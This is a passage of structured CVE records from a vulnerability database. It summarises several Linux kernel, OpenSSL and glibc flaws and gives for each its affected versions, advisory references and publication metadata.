"https://bugzilla.redhat.com/show_bug.cgi?id=2152548" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/tree/queue-6.0/proc-avoid-integer-type-confusion-in-get_proc_long.patch" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/tree/queue-6.0/proc-proc_skip_spaces-shouldn-t-think-it-is-working-on-c-strings.patch" }, { "url": "https://seclists.org/oss-sec/2022/q4/178" }, { "url": "http://packetstormsecurity.com/files/171289/Kernel-Live-Patch-Security-Notice-LNS-0092-1.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-4378", "datePublished": "2023-01-05T00:00:00", "dateReserved": "2022-12-09T00:00:00", "dateUpdated": "2024-08-03T01:41:44.182Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-23454
Vulnerability from cvelistv5
Published
2023-01-12 00:00
Modified
2024-08-02 10:28
Severity ?
EPSS score ?
Summary
cbq_classify in net/sched/sch_cbq.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service (slab-out-of-bounds read) because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results).
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T10:28:40.976Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/10/1" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/10/4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=caa4b35b4317d5147b3ab0fbdc9c075c7d2e9c12" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "cbq_classify in net/sched/sch_cbq.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service (slab-out-of-bounds read) because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results)." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2023/01/10/1" }, { "url": "https://www.openwall.com/lists/oss-security/2023/01/10/4" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=caa4b35b4317d5147b3ab0fbdc9c075c7d2e9c12" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-23454", "datePublished": "2023-01-12T00:00:00", "dateReserved": "2023-01-12T00:00:00", "dateUpdated": "2024-08-02T10:28:40.976Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2097
Vulnerability from cvelistv5
Published
2022-07-05 10:30
Modified
2024-09-17 01:06
Severity ?
EPSS score ?
Summary
AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:24:44.189Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220705.txt" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=a98f339ddd7e8f487d6e0088d4a9a42324885a93" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=919925673d6c9cfed3c1085497f5dfbbed5fc431" }, { "name": "FEDORA-2022-3fdc2d3047", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/" }, { "name": "FEDORA-2022-89a17be281", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0011/" }, { "name": "FEDORA-2022-41890e9e44", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/" }, { "name": "GLSA-202210-02", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202210-02" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf" }, { "name": "DSA-5343", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5343" }, { "name": "[debian-lts-announce] 20230220 [SECURITY] [DLA 3325-1] openssl security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230420-0008/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:openssl:openssl:1.1.1:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "openssl", "vendor": "openssl", "versions": [ { "lessThan": "1.1.1q", "status": "affected", "version": "1.1.1", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:a:openssl:openssl:3.0.0:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "openssl", "vendor": "openssl", "versions": [ { "lessThan": "3.0.5", "status": "affected", "version": "3.0.0", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:a:netapp:ontap_antivirus_connector:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "ontap_antivirus_connector", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "ontap_select_deploy_administration_utility", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "fedora", "vendor": "fedoraproject", "versions": [ { "status": "affected", "version": "35" }, { "status": "affected", "version": "36" } ] }, { "cpes": [ "cpe:2.3:a:netapp:active_iq_unified_manager_for_vmware_vsphere:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "active_iq_unified_manager_for_vmware_vsphere", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:a:netapp:hci_baseboard_management_controller:h300s:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h410c:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h410s:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h500s:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_baseboard_management_controller:h700s:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "hci_baseboard_management_controller", "vendor": "netapp", "versions": [ { "status": "affected", "version": "h300s" }, { "status": "affected", "version": "h410c" }, { "status": "affected", "version": "h410s" }, { "status": "affected", "version": "h500s" }, { "status": "affected", "version": "h700s" } ] }, { "cpes": [ "cpe:2.3:o:netapp:brocade_fabric_operating_system_firmware:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "brocade_fabric_operating_system_firmware", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:a:netapp:snapcenter:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "snapcenter", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:a:netapp:oncommand_insight:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "oncommand_insight", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:a:netapp:smi-s_provider:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "smi-s_provider", "vendor": "netapp", "versions": [ { "status": "affected", "version": "0" } ] }, { "cpes": [ "cpe:2.3:a:siemens:sinec_ins:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "sinec_ins", "vendor": "siemens", "versions": [ { "lessThan": "1.0_sp2_update_1", "status": "affected", "version": "0", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "debian_linux", "vendor": "debian", "versions": [ { "status": "affected", "version": "10.0" }, { "status": "affected", "version": "11.0" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2022-2097", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-26T19:45:07.166681Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-08T15:19:36.662Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4)" }, { "status": "affected", "version": "Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p)" } ] } ], "credits": [ { "lang": "en", "value": "Alex Chernyakhovsky" } ], "datePublic": "2022-07-05T00:00:00", "descriptions": [ { "lang": "en", "value": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn\u0027t written. In the special case of \"in place\" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p)." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#moderate", "value": "Moderate" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Fencepost error", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-21T19:07:25.963480", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "url": "https://www.openssl.org/news/secadv/20220705.txt" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=a98f339ddd7e8f487d6e0088d4a9a42324885a93" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=919925673d6c9cfed3c1085497f5dfbbed5fc431" }, { "name": "FEDORA-2022-3fdc2d3047", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/" }, { "name": "FEDORA-2022-89a17be281", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/" }, { "url": "https://security.netapp.com/advisory/ntap-20220715-0011/" }, { "name": "FEDORA-2022-41890e9e44", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/" }, { "name": "GLSA-202210-02", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202210-02" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf" }, { "name": "DSA-5343", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5343" }, { "name": "[debian-lts-announce] 20230220 [SECURITY] [DLA 3325-1] openssl security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230420-0008/" }, { "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "title": "AES OCB fails to encrypt some bytes" } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-2097", "datePublished": "2022-07-05T10:30:13.658000Z", "dateReserved": "2022-06-16T00:00:00", "dateUpdated": "2024-09-17T01:06:49.390Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1473
Vulnerability from cvelistv5
Published
2022-05-03 15:15
Modified
2024-09-16 18:19
Severity ?
EPSS score ?
Summary
The OPENSSL_LH_flush() function, which empties a hash table, contains a bug that breaks reuse of the memory occuppied by the removed hash table entries. This function is used when decoding certificates or keys. If a long lived process periodically decodes certificates or keys its memory usage will expand without bounds and the process might be terminated by the operating system causing a denial of service. Also traversing the empty hash table entries will take increasingly more time. Typically such long lived processes might be TLS clients or TLS servers configured to accept client certificate authentication. The function was added in the OpenSSL 3.0 version thus older releases are not affected by the issue. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2).
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:03:06.287Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=64c85430f95200b6b51fe9475bd5203f7c19daf1" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "name": "GLSA-202210-02", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202210-02" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)" } ] } ], "credits": [ { "lang": "en", "value": "Aliaksei Levin" } ], "datePublic": "2022-05-03T00:00:00", "descriptions": [ { "lang": "en", "value": "The OPENSSL_LH_flush() function, which empties a hash table, contains a bug that breaks reuse of the memory occuppied by the removed hash table entries. This function is used when decoding certificates or keys. If a long lived process periodically decodes certificates or keys its memory usage will expand without bounds and the process might be terminated by the operating system causing a denial of service. Also traversing the empty hash table entries will take increasingly more time. Typically such long lived processes might be TLS clients or TLS servers configured to accept client certificate authentication. The function was added in the OpenSSL 3.0 version thus older releases are not affected by the issue. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#Low", "value": "Low" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=64c85430f95200b6b51fe9475bd5203f7c19daf1" }, { "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "name": "GLSA-202210-02", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202210-02" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "Resource leakage when decoding certificates and keys" } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-1473", "datePublished": "2022-05-03T15:15:25.051136Z", "dateReserved": "2022-04-26T00:00:00", "dateUpdated": "2024-09-16T18:19:16.240Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3115
Vulnerability from cvelistv5
Published
2022-12-14 00:00
Modified
2024-08-03 01:00
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 5.16-rc6. malidp_crtc_reset in drivers/gpu/drm/arm/malidp_crtc.c lacks check of the return value of kzalloc() and will cause the null pointer dereference.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:00:10.239Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=v5.19-rc2\u0026id=73c3ed7495c67b8fbdc31cf58e6ca8757df31a33" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153058" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux 5.16-rc6" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 5.16-rc6. malidp_crtc_reset in drivers/gpu/drm/arm/malidp_crtc.c lacks check of the return value of kzalloc() and will cause the null pointer dereference." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-14T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?h=v5.19-rc2\u0026id=73c3ed7495c67b8fbdc31cf58e6ca8757df31a33" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153058" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3115", "datePublished": "2022-12-14T00:00:00", "dateReserved": "2022-09-02T00:00:00", "dateUpdated": "2024-08-03T01:00:10.239Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1679
Vulnerability from cvelistv5
Published
2022-05-16 00:00
Modified
2024-08-03 00:10
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in the Linux kernel’s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:10:03.805Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/87ilqc7jv9.fsf%40kernel.org/t/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220629-0007/" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 5.18-rc7" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in the Linux kernel\u2019s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/87ilqc7jv9.fsf%40kernel.org/t/" }, { "url": "https://security.netapp.com/advisory/ntap-20220629-0007/" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-1679", "datePublished": "2022-05-16T00:00:00", "dateReserved": "2022-05-12T00:00:00", "dateUpdated": "2024-08-03T00:10:03.805Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-23218
Vulnerability from cvelistv5
Published
2022-01-14 00:00
Modified
2024-08-03 03:36
Severity ?
EPSS score ?
Summary
The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T03:36:20.198Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-24" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768" }, { "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202208-24" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-23218", "datePublished": "2022-01-14T00:00:00", "dateReserved": "2022-01-14T00:00:00", "dateUpdated": "2024-08-03T03:36:20.198Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-23455
Vulnerability from cvelistv5
Published
2023-01-12 00:00
Modified
2024-08-02 10:28
Severity ?
EPSS score ?
Summary
atm_tc_enqueue in net/sched/sch_atm.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results).
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T10:28:40.920Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/10/1" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/01/10/4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a2965c7be0522eaa18808684b7b82b248515511b" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "atm_tc_enqueue in net/sched/sch_atm.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results)." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2023/01/10/1" }, { "url": "https://www.openwall.com/lists/oss-security/2023/01/10/4" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a2965c7be0522eaa18808684b7b82b248515511b" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-23455", "datePublished": "2023-01-12T00:00:00", "dateReserved": "2023-01-12T00:00:00", "dateUpdated": "2024-08-02T10:28:40.920Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-36280
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 00:01
Severity ?
EPSS score ?
Summary
An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
